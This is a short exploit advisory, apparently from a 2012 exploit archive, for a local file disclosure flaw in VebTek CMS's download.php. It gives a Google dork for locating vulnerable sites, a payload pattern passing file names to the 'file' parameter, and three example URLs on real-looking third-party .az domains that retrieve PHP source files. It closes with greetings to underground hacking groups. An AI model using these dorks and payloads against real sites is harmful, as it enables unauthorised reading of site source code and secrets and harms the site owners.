# Name: VebTek CMS LFD Vulnerability

# Google Dork: intext:"Hosted by VebTek"
# Type: PHP
# Date: 2012-01-27
# Author: BHG Security Center
# Discovered by: Mr.XHat
# Home: Black-HG.org/cc/
# Tested On: Linux (Apache)
###########################

# Demo:

http://localhost/[Path]/download.php?file=[LFD]

# Exploit:

http://plastex.az/2012/download.php?file=resize.php

http://www.autoshow.az/2012/download.php?file=image.php

http://worldfood.az/2012/download.php?file=download.php

#######################################################

Special Thanks To: Net.Edit0r | 3H34N | A.Cr0x | tHe.k!ll3r | ArYaIeIrAN | G3n3Rall | H-SK33PY | NoL1m1t And All #BHG Members

Greets To: Inj3ct0r Team (1337day.com) And All Underground Hackers

# [1337day.com][1] [2012-01-27]

[1]: http://www.1337day.com/

Source: http://www.1337day.com/exploits/17447